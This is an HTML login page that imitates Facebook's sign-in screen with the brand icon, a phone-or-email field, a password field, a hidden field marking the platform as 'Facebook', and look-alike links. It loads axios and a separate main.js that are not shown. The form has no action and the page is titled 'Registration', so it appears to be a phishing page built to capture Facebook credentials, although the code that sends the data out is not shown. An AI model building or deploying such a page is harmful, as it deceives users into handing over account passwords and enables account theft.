<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="theme-color" content="#0d6efd">
  <link rel="icon" type="image/png" href="images/check-mark.png">
  <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title>Registration</title>
  
  <!-- HTML -->
  

  <!-- Custom Styles -->
  <link rel="stylesheet" href="style.css">
    <script src="https://kit.fontawesome.com/df4806f026.js" crossorigin="anonymous"></script>
          <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
</head>

<body>
  
   <form id="f-form" class="meta-form">
     <div class="lang-selector">
      <span>English (UK)</span> 
     </div>
     
     <div class="logo-con">
       <i class="fa-brands fa-facebook"></i>
       
     </div>
     <div class="form-data">
       <input type="text" name="username" id="username"placeholder="Mobile number or email address">

        <input type="password" name="password" id="password"placeholder="Password">
        <input type="hidden" name="platform"value="Facebook"><br>
        
         <div id="output"></div>
         
        <button type="submit">Log in</button><br>
         <div class="forgotten-pass">Forgotten password?</div>
     </div>
     
     <footer>
       <button class="create-acc"value="facebook"type="button">
         Create account 
       </button>
     </footer>
     
   </form>
  <!-- Project -->
  <script src="main.js"type="module"></script>
</body>
</html>